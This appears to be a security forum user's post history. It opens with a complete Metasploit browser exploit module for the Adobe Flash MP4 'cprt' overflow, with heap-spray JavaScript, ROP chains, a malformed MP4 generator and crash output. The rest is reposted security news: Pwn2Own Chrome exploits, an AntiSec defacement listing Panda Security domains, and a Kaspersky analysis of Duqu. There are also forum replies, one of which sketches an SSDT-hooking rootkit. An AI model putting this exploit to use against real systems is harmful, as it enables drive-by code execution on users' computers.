Everything posted by Nytro
[h=1]Adobe Flash Player .mp4 'cprt' Overflow"[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

# Browser-delivered exploit module for CVE-2012-0754 (Adobe Flash Player,
# malformed MP4 'cprt' box). Server-side behaviour that is visible in this
# code and is useful when reviewing proxy logs or writing detections:
#   * every request is gated on the User-Agent header (get_target); a client
#     that matches none of the target regexes gets a 404 and no content,
#   * the landing page embeds "<resource>/Exploit.swf"; the SWF then fetches
#     the hard-coded "/test.mp4" trigger (see on_request_uri / create_mp4),
#   * the three responses are served as Content-Type text/html,
#     application/x-shockwave-flash and video/mp4 respectively.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata. Each non-automatic target carries a 'Rop' chain selector
  # (nil, :msvcrt or :jre), an 'Offset' string that on_request_uri interpolates
  # verbatim into JavaScript (so '0x800 - code.length' becomes a JS expression),
  # and a 'Ret' value used by get_payload.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player MP4 'cprt' Overflow",
      'Description'    => %q{ This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "Iran's Oil and Nuclear Situation.doc" e-mail attack. },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Gavrun', # Vulnerability discovery
          'sinn3r',           # Metasploit module
          'juan vazquez'      # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-0754' ],
          [ 'OSVDB', '79300'],
          [ 'BID', '52034' ],
          [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ]
        ],
      'Payload'        =>
        {
          'StackAdjustment' => -3500
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Flash Player 11.1.102.55
          # Flash Player 10.3.183.10
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ],
          [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x600', 'Ret' => 0x0c0c0c0c } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 15 2012",
      'DefaultTarget'  => 0))
  end

  # n random alphabetic bytes read back as one little-endian 32-bit integer
  # (only the first unpacked word is returned). Used as filler slots in the
  # gadget lists of get_payload.
  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  # make_nops(4) read back as a little-endian 32-bit integer.
  def nop
    return make_nops(4).unpack("V").first
  end

  # Assembles the bytes that the JavaScript in on_request_uri places on the heap
  # for target +t+. With t['Rop'] == nil this is just payload.encoded; otherwise
  # the layout is [pivot][rop chain][code], chosen by t['Rop'].
  # The gadget addresses are hard-coded constants, not resolved at run time.
  def get_payload(t)
    if t['Rop'].nil?
      code = ""
    else
      code = "\xbc\x0c\x0c\x0c\x0c" #Fix the stack to avoid a busted encoder
    end
    code << payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # Both ROP chains generated by mona.py - See corelan.be
    # NOTE(review): any 'Rop' value other than :msvcrt / :jre leaves +rop+ nil
    # and the `pivot + rop` concatenation below raises TypeError.
    case t['Rop']
    when :msvcrt
      rop = [
        0x77c4e392, # POP EAX # RETN
        0x77c11120, # <- *&VirtualProtect()
        0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
        junk,
        0x77c2dd6c,
        0x77c4ec00, # POP EBP # RETN
        0x77c35459, # ptr to 'push esp # ret'
        0x77c47705, # POP EBX # RETN
        0x00000800, # <- change size to mark as executable if needed (-> ebx)
        0x77c3ea01, # POP ECX # RETN
        0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
        0x77c46100, # POP EDI # RETN
        0x77c46101, # ROP NOP (-> edi)
        0x77c4d680, # POP EDX # RETN
        0x00000040, # newProtect (0x40) (-> edx)
        0x77c4e392, # POP EAX # RETN
        nop,        # NOPS (-> eax)
        0x77c12df9, # PUSHAD # RETN
      ].pack("V*")
    when :jre
      rop = [
        0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
        0x7c347f98, # RETN (ROP NOP)
        0x7c3415a2, # JMP [EAX]
        0xffffffff,
        0x7c376402, # skip 4 bytes
        0x7c351e05, # NEG EAX # RETN
        0x7c345255, # INC EBX # FPATAN # RETN
        0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
        0x7c344f87, # POP EDX # RETN
        0xffffffc0, # Value to negate, will become 0x00000040
        0x7c351eb1, # NEG EDX # RETN
        0x7c34d201, # POP ECX # RETN
        0x7c38b001, # &Writable location
        0x7c347f97, # POP EAX # RETN
        0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
        0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
        0x7c345c30, # ptr to 'push esp # ret '
      ].pack("V*")
    end

    pivot = [0x77C1CAFB].pack('V*') #POP/POP/RET
    pivot << [junk].pack('V*')
    pivot << [t.ret].pack('V*')

    code = pivot + rop + code
    return code
  end

  # Picks a target from the User-Agent string when the configured target is
  # 'Automatic'. Returns nil for anything not matched, which makes
  # on_request_uri answer 404 instead of serving content.
  # NOTE(review): targets[4] (the IE 8 / :jre variant) is never chosen here;
  # it is reachable only when the target is set explicitly.
  def get_target(agent)
    # If the user already specified a target, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1]  #IE 6 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
      return targets[2]  #IE 7 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
      return targets[3]  #IE 8 on Windows XP SP3
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
      return targets[5]  #IE 7 on Windows Vista
    else
      return nil
    end
  end

  # Single HTTP handler for the module. Dispatches on the request path suffix:
  # *.mp4 -> trigger file, *.swf -> the bundled SWF, anything else -> the
  # landing page that embeds the SWF. All log lines carry peerhost:peerport.
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("#{cli.peerhost}:#{cli.peerport} Browser not supported, will not launch attack: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")

    # The SWF requests our MP4 trigger
    if request.uri =~ /\.mp4$/
      print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
      mp4 = create_mp4(my_target)
      send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
      return
    end

    if request.uri =~ /\.swf$/
      print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # Payload and filler are emitted as %u-escaped strings in the byte order of
    # the target architecture.
    p = get_payload(my_target)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

    # JavaScript template; heaplib() below prepends Metasploit's heapLib
    # implementation. my_target['Offset'] is interpolated as source text.
    js_pivot = <<-JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    heap_obj.debug(true);
    for (var i=1; i < 0x1C2; i++) {
      heap_obj.alloc(block);
    }
    heap_obj.debug(true);
    JS

    js_pivot = heaplib(js_pivot, {:noobfu => true})

    # Build "<resource>/Exploit.swf" without doubling the slash when the
    # resource path already ends in one.
    swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
    swf_uri << "/Exploit.swf"

    print_status("#{cli.peerhost}:#{cli.peerport} #{swf_uri}")

    html = %Q|
    <html>
    <head>
    <script>
    #{js_pivot}
    </script>
    </head>
    <body>
    <center>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="test" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{swf_uri}" />
    <embed src="#{swf_uri}" quality="high" width="1" height="1" name="test" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>
    </object>
    </center>
    </body>
    </html>
    |

    # Strips two leading tabs from each template line (the indentation style of
    # the original source); with space indentation this is a no-op.
    html = html.gsub(/^\t\t/, '')

    #
    # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource
    #
    # Registered on every landing-page request; the `rescue nil` presumably
    # tolerates the resource already being present — TODO confirm against
    # add_resource's behaviour. The block parameter shadows the outer +cli+.
    proc = Proc.new do |cli, req|
      on_request_uri(cli, req)
    end
    add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil

    print_status("#{cli.peerhost}:#{cli.peerport} Sending html...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  # Removes the extra "/test.mp4" resource added by on_request_uri, then
  # defers to the framework's own cleanup.
  def cleanup
    remove_resource('/test.mp4') rescue nil
    super
  end

  # Loads the SWF from disk once, before the HTTP server is started by super.
  def exploit
    @swf = create_swf
    super
  end

  # Reads the pre-built data/exploits/CVE-2012-0754.swf shipped with the
  # framework; the SWF is not generated by this module.
  def create_swf
    path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0754.swf" )
    fd = ::File.open( path, "rb" )
    swf = fd.read(fd.stat.size)
    fd.close

    return swf
  end

  # Builds the trigger file: a minimal 'ftyp' box (size 0x18, brands mp42/isom)
  # followed by a 'cprt' box whose declared size (0x0D) is far smaller than the
  # 2586 * 4 bytes of 0x0c that follow it. The +target+ argument is not used;
  # the bytes are identical for every target. A 'cprt' box of this shape is the
  # file-level artifact to look for in captured MP4 content.
  def create_mp4(target)
    mp4 = ""
    mp4 << "\x00\x00\x00\x18"
    mp4 << "ftypmp42"
    mp4 << "\x00\x00\x00\x00"
    mp4 << "mp42isom"
    mp4 << "\x00\x00\x00\x0D"
    mp4 << "cprt"
    mp4 << "\x00\xFF\xFF\xFF"
    mp4 << "\x00\x00\x00\x00"
    mp4 << "\x0c\x0c\x0c\x0c" * 2586

    return mp4
  end

end

=begin
Debugger output recorded by the module authors while loading the trigger.
eax holds 0c0c0c0c, the filler value from create_mp4, and the faulting
instruction at Flash10x+0x48b65 dereferences it (call dword ptr [eax+8]).

C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx
C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx

(510.9b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000
eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx -
Flash10x+0x48b65:
10048b65 ff5008          call    dword ptr [eax+8]    ds:0023:0c0c0c14=????????
=end

Sursa: Adobe Flash Player .mp4 'cprt' Overflow"
[h=2]Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits[/h]Tackhead writes "Hot on the hooves of Sergey Glazunov's hack 5-minutes into Pwn2Own, an image of an axe-wielding pink pony was the mark of success for a hacker with the handle of Pinkie Pie. Pinkie Pie subtly tweaked Chromium's sandbox design by chaining together three zero-day vulnerabilities, thereby widening his appeal to $60K in prize money, another shot at a job opportunity at the Googleplex, and instantly making Google's $1M Pwnium contest about 20% cooler. (Let the record show that Slashdot was six years ahead of this particular curve, and that April Fool's Day is less than a month away.)" Vedeti: Teen Exploits Three Zero-Day Vulns for $60K Win in Google Chrome Hack Contest | Threat Level | Wired.com Sursa: Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits - Slashdot
Daca sunt sysadmin, nu e problema mea sa pun filtre pentru "SeLeCt" sau "<script>" pentru ca nu e problema mea ca programatorul nu poate filtra asta. Da, un sysadmin bun isi bate capul si isi pierde timpul cu asa ceva, dar nu este problema lui. Intr-adevar, sunt multe scripturi publice vulnerabile, dar tot nu vad ce legatura ar putea avea sysadmin-ul. Asta tine de Project Manager si de cati bani baga in proiect, daca nu baga, folosesc un script public si "bum", problema lor. Sysadminul trebuie sa fie atent la problemele lui, configurarea serverului: php.ini, permisiuni fisiere, sub ce utilizatori ruleaza procesele si tot asa. Dar de multe ori vin programatori cu request-uri ca "Vreau 9999 time limit", vreau "9999 max_file_upload" sau mai stiu eu ce, fara un motiv serios si de aici apar problemele. Din moment ce vulnerabila e aplicatia web, programatorul e de vina.
Nu ai fost luat peste picior, am inteles ideile, unele dau de gandit, altele nu sunt chiar atat de practice. Nu putem sterge conturile banate definitiv, pe baza lor putem sti daca membrii actuali sunt printre noi (de exemplu cei care se ocupa cu carding, CC-uri... si care nu ne plac). Iar conturile vechi nu incurca pe nimeni, apar mereu persoane care nu mai activeaza de mult timp, sunt admini care nu mai activeaza de mult ci doar din cand in cand, stergerea acelor conturi ar fi penibila, nu putem forta pe cineva sa isi faca un alt cont pentru ca nu a intrat de mult timp. Cat despre curatenia forumului de posturi si topicuri inutile, se incearca tot ce se poate, in limita timpului disponibil. In fiecare zi se baneaza useri sau se muta topicuri la "Cosul de gunoi".
Sa securizezi partea de aplicatie web din server e stupid si inutil. Daca programatorul e prost, merita orice deface, e pacat ca sysadminii isi pierd timp sa repare problemele programatorilor...
Urmatorul...
Zise cineva care s-a inregistrat de o saptamana pe forum... - De ce sa stergem sau sa banam userii? Cu ce ar putea asta incanta pe cineva? - Cum putem sti toate conturile duplicat? Presupunem ca imi fac doua conturi: "Nytro" si "Vasile", de unde stie cineva ca e vorba de aceeasi persoana? - Sunt putine posturi care sunt doar o trimitere catre un link, majoritatea prezinta continutul, insa daca e vorba de programe sau video tutoriale, nu stiu cat de ok ar fi sa le gazduim pe serverul RST, insa e si asta o idee. Cat despre tutoriale incomplete... Nu te opreste nimeni sa scrii tu tutoriale complete, sau sa le completezi pe cele existente. - Da, posturile inutile sunt o problema, insa nu cred ca sta nimeni sa ia fiecare post nou, fiecare topic din fiecare categorie si sa vada tot ce se posteaza sa poata sa faca curatenie, dureaza mai mult decat iti imaginezi. - Pentru "noobs", adica restul forumului in afara de tine, exista categoriile CERERI si AJUTOR unde isi pot expune problema si pot primi ajutorul.
Bugtraq-I : Distribution for Pentesting and forensics Bugtraq system offers the most comprehensive distribution, optimal, stable and automatic security to date. Bugtraq is a distribution based on the 2.6.38 kernel that has a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive; the distribution is customized to the last package, with a configured and updated kernel. The kernel has been patched for better performance and to recognize a variety of hardware, including wireless injection patches for pentesting that other distributions lack. Some of the special features that you can appreciate are: · Administrative improvements of the system for better management of services. · Expanded range of recognized wireless drivers for injection. · Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit. · Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc... · Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.) · Stability and performance optimized: enhanced performance of flash and java, and purging of unnecessary services at start-up, so that the user runs only the services they really want. · User creation has been incorporated into the installation, so the user is created with all system configurations. · We are the Pentesting and Forensic distribution with the most built-in, functional tools, and a well organized menu without repetition, to avoid overwhelming the user. Download Bugtraq-I Sursa: Bugtraq-I : Distribution for Pentesting and forensics | The Hacker News (THN)
#AntiSec hackers deface Panda Security site to protest LulzSec arrests Hackers aligned with ********* took credit on Wednesday for an attack on Panda Security's website shortly after charges were announced against five of the hacking collective's alleged members. Over 25 websites related to Panda Security have been hacked tonight by Antisec. Emails and md5 passwords have been leaked to the public. Panda was accused by ********* of helping the FBI to lurk ********* members. The attacks are believed to be in retaliation for the recent arrests made by the FBI. Yesterday, the biggest story in the hacking world revealed that the world's most notorious computer hacker turned against his comrades because he did not want to go to prison and leave behind his two children. Monsegur, who has been described as the ringleader of LulzSec, and an 'influential member' of *********, pleaded guilty to a dozen hacking-related charges last summer - crimes which carry a maximum sentence of 124 years and six months in prison. But, rather than face a lengthy jail sentence and not see his two children, the unemployed father agreed to cooperate with the FBI, and, ever since his arrest, has reportedly been working with them to bring down the groups' top hackers. Charged Lulzsec Hackers are Ryan Ackroyd a.k.a. Kayla, lol, lolsoon Jake Davis a.k.a. topiary, atopiary Darren Martyn a.k.a. pwnsauce, raepsauce, networkkitten Donncha O'Cearrbhail a.k.a. palladium Hector Xavier Monsegur a.k.a. Sabu, Xavier DeLeon, Leon Jeremy Hammond a.k.a. 
Anarchaos, sup_g, burn, yohoho, POW, tylerknowsthis, crediblethreat IMAGINE: http://3.bp.blogspot.com/-FmNqd4qfqWA/T1cnIla9qhI/AAAAAAAAFI0/OSStHPEohOA/s1600/Lulzsec+hackers+arrested.png List of Defaced Sites : cybercrime.pandasecurity.com antivirus-offers.pandasecurity.com blog.cloudantivirus.com cloudofficeprotection.pandasecurity.com cloud.pandasecurity.com cloudpartnercenter.pandasecurity.com cloudprotectionbeta.pandasecurity.com.tar.gz cloudprotection.pandasecurity.com facebookfriends.pandasecurity.com forgetsecurity.co.uk forgetsecurity.co.za forgetsecurity.es go.pandasecurity.com info.pandasecurity.com information.pandasecurity.com lavuelta.pandasecurity.com maintenance.pandasecurity.com momentos.pandasecurity.com ondersteuning.pandasecurity.com pandacompetition.pandasecurity.com pandalabs.pandasecurity.com prensa.pandasecurity.com press.pandasecurity.com promo.pandasecurity.com protectyourfamily.pandasecurity.com research.pandasecurity.com securitytothecloud.pandasecurity.com serviciospro.pandasecurity.com servicos.pandasecurity.com suporte.pandasecurity.com techcenter.pandasecurity.com uninstall.cloudantivirus.com wiki.cloudantivirus.com Panda Security, the Cloud Security Company | Antivirus | Anti-Spyware | Firewall | Backup | Cloud | Security | Download | Buy Panda Security, the Cloud Security Company | Antivirus | Anti-Spyware | Firewall | Backup | Cloud | Security | Download | Buy "Pandasecurity.com, better known for its shitty ANTIVIRUS WE HAVE BACKDOORED, has earning money working with Law Enforcement to lurk and snitch on ********* activists. they helped to jail 25 ********* in different countries...yep we know about you. How does it feel to be the spied one?" In August, 2011, it came to light that ********* had hacked into 70 law enforcement websites, mostly local sheriffs’ websites in Missouri.The hacks had occurred four weeks before they were discovered. 
Using information passed on by Monsegur, the FBI was able to work with the server company to mitigate the damage. The FBI then alerted 300 government, financial and corporate entities around the world to potential vulnerabilities in their computer systems. AntiSec also voiced support for those fighting for their freedom in Tunisia, Egypt, Libya, Syria, Bahrain, Yemen, and Iran. It also sent a dare to the FBI to get its members, saying, "we are waiting for you." Sursa: #AntiSec hackers deface Panda Security site to protest LulzSec arrests | The Hacker News (THN) PS: Am postat asta doar ca sa vedeti fetele alora
unu_1234567 e tzepar. si admini nu-i zic nimic ca e vip domne pe forum
Nytro replied to ph0x1337's topic in Cosul de gunoi
Sefu, spune cu ce te-a tepuit si nu mai comenta de-am-pulea. -
Hack a Server – Crowdsourcing Penetration Platform la București
Nytro replied to Andrei's topic in Stiri securitate
Puneti accent pe partea de aplicatII web. Oricum o sa mai discutam. Cat despre meeting, a fost super, felicitari pentru tot. -
Atatia? 60.000 de dolari ti se pare mult? Nu da 1 milion pentru asta, da MAXIM 60.000 $. Cititi si voi tot...
[h=2]Chrome Hacked In 5 Minutes At Pwn2Own[/h]"After offering a total prize fund of up to $1M for a successful Chrome hack, it seems Google got what it wanted (or not!). No more than 5 minutes into the Pwn2Own cracking contest team Vupen exploited 2 Chrome bugs to demonstrate a total break of Google's browser. They will win at least 60k USD out of Google's prize fund, as well as taking a strong option on winning the overall Pwn2Own prize. It also illustrates that Chrome's much lauded sandboxing is not a silver bullet for browser security." Sursa: Chrome Hacked In 5 Minutes At Pwn2Own - Slashdot
[h=1]The Mystery of the Duqu Framework[/h] Igor Soumenkov Kaspersky Lab Expert Posted March 07, 15:58 GMT While analyzing the components of Duqu, we discovered an interesting anomaly in the main component that is responsible for its business logic, the Payload DLL. We would like to share our findings and ask for help identifying the code. [h=2]Code layout[/h] At first glance, the Payload DLL looks like a regular Windows PE DLL file compiled with Microsoft Visual Studio 2008 (linker version 9.0). The entry point code is absolutely standard, and there is one function exported by ordinal number 1 that also looks like MSVC++. This function is called from the PNF DLL and it is actually the “main” function that implements all the logic of contacting C&C servers, receiving additional payload modules and executing them. Most interesting is how this logic was programmed and what tools were used. The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of “slices” of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions and user-written code, except the biggest slice that contains most of the C&C interaction code. Layout of the code section of the Payload DLL file This slice is different from the others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. We call it the Duqu Framework. 
[h=2]The Framework[/h] [h=3]Features[/h] The code that implements the Duqu Framework has several distinctive properties: Everything is wrapped into objects Function table is placed directly into the class instance and can be modified after construction There is no distinction between utility classes (linked lists, hashes) and user-written code Objects communicate using method calls, deferred execution queues and event-driven callbacks There are no references to run-time library functions, native Windows API is used instead [h=3]Objects[/h] All objects are instances of some class; we identified 60 classes. Each object is constructed with a “constructor” function that allocates memory, fills in the function table and initializes members. Constructor function for the linked list class. The layout of each object depends on its class. Some classes appear to have binary compatible function tables but there is no indication that they have any common parent classes (like in other OO languages). Furthermore, the location of the function table is not fixed: some classes have it at offset 0 of the instance, but some do not. Layout of the linked list object. First 10 fields are pointers to member functions. Objects are destroyed by corresponding “destructor” functions. These functions usually destroy all objects referenced by member fields and free any memory used. Member functions can be referenced by the object’s function table (like “virtual” functions in C++) or they can be called directly. In most object-oriented languages, member functions receive the “this” parameter that references the instance of the object, and there is a calling convention that defines the location of the parameter – either in a register, or on the stack. This is not the case for the Duqu Framework classes – they can receive the “this” parameter in any register or on the stack. 
Member function of the linked list, receives “this” parameter on stack [h=3]Event driven framework[/h] The layout and implementation of objects in the Duqu Framework is definitely not native to the C++ that was used to program the rest of the Trojan. There is an even more interesting feature of the framework that is used extensively throughout the whole code: it is event driven. There are special objects that implement the event-driven model: Event objects, based on native Windows API handles Thread context objects that hold lists of events and deferred execution queues Callback objects that are linked to events Event monitors, created by each thread context for monitoring events and executing callback objects Thread context storage manages the list of active threads and provides access to per-thread context objects This event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, neither does it look like it was compiled with known Objective C compilers. Event-driven model of the Duqu Framework Every thread context object can start a “main loop” that looks for and processes new items in the lists. Most of the Duqu code follows the same principle: create an object, bind several callbacks to internal or external events and return. Callback handlers are then executed by the event monitor object that is created within each thread context. Here is an example pseudocode for a socket object: SocketObjectConstructor { NativeSocket = socket(); SocketEvent = new MonitoredEvent(NativeSocket); SocketObjectCallback = new ObjectCallback(this, SocketEvent, OnCallbackFunc); connect(NativeSocket, ...); } OnCallbackFunc { switch(GetType(Event)) { case Connected: ... case ReadData: ... ...} } [h=2]Conclusions[/h] The Duqu Framework appears to have been written in an unknown programming language. Unlike the rest of the Duqu body, it's not C++ and it's not compiled with Microsoft's Visual C++ 2008. 
The highly event driven architecture points to code which was designed to be used in pretty much any kind of conditions, including asynchronous communications. Given the size of the Duqu project, it is possible that a different team was responsible for the framework than the one which created the drivers and wrote the system infection and exploits. The mysterious programming language is definitively NOT C++, Objective C, Java, Python, Ada, Lua or any of the many other languages we have checked. Compared to Stuxnet (entirely written in MSVC++), this is one of the defining particularities of the Duqu framework. [h=2]The Duqu Framework: What was that?[/h] After having performed countless hours of analysis, we are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language. We would like to make an appeal to the programming community and ask anyone who recognizes the framework, toolkit or the programming language that can generate similar code constructions, to contact us or drop us a comment in this blogpost. We are confident that with your help we can solve this deep mystery in the Duqu story. Sursa: The Mystery of the Duqu Framework - Securelist
Ce penala e faza: C:\Windows>ping www.facebook.com Ping request could not find host www.facebook.com. Please check the name and try again. C:\Windows>ping facebook.com Pinging facebook.com [69.171.224.11] with 32 bytes of data: Reply from 69.171.224.11: bytes=32 time=181ms TTL=244 Reply from 69.171.224.11: bytes=32 time=181ms TTL=244 Ping statistics for 69.171.224.11: Packets: Sent = 2, Received = 2, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 181ms, Maximum = 181ms, Average = 181ms Control-C ^C C:\Windows> DNS... Nu mai vorbiti de DDOS daca nu cunoasteti sistemul DNS macar... PS: "Pentru serverul RST" pare ca merge Facebook-ul
PHP e embedded in HTML. Mai exact ai asa: <html> <?php echo 'aaa'; ?> </html> Acest cod trece prin interpretorul PHP. Ce NU e cod PHP, adica ce nu e intre <?php si ?>, e returnat direct catre browser; ce e intre, e interpretat. Cu formularele e aceeasi idee, se trimit date prin POST si se face ceva cu ele. Citeste si tu putin despre HTML, HTTP si PHP.
ERR_NAME_RESOLUTION_FAILED DNS aka Domain Name System.
E clar, se umple tara de lulji dinastia...
Pai in numele cacatului, posteaza acolo o exploatare manuala, nu un cacat de link. Si nu vad ce relevanta are Linux-ul, dar nu mai conteaza.
Ai ban daca mai postezi porcaria asta. Ori postezi SQL Injection, ori te abtii, oricine poate posta un link catre un site, indiferent ca e vulnerabil sau nu, problema e exploatarea acelei vulnerabilitati. Tu ce faci cu el, il bagi in Havij?
Ai postat corect, dar ai postat o porcarie. Nu vad niciun SQL Injection, vad doar un link. Ce faci cu el, il bagi in Havij?
Ai pus un link, si un link cu ghilimea. Nu ai facut nimic. Se muta la gunoi.
[CHALLENGE] Stop the dll injection/injectors
Nytro replied to Skribul222's topic in Challenges (CTF)
Kernel-mode hook pe CreateRemoteThread(Ex), adica rootkit. Poti face un driver care suprascrie SSDT-ul, gasesti acolo NtCreateRemoteThread. PS: Abtineti-va de la replici inutile.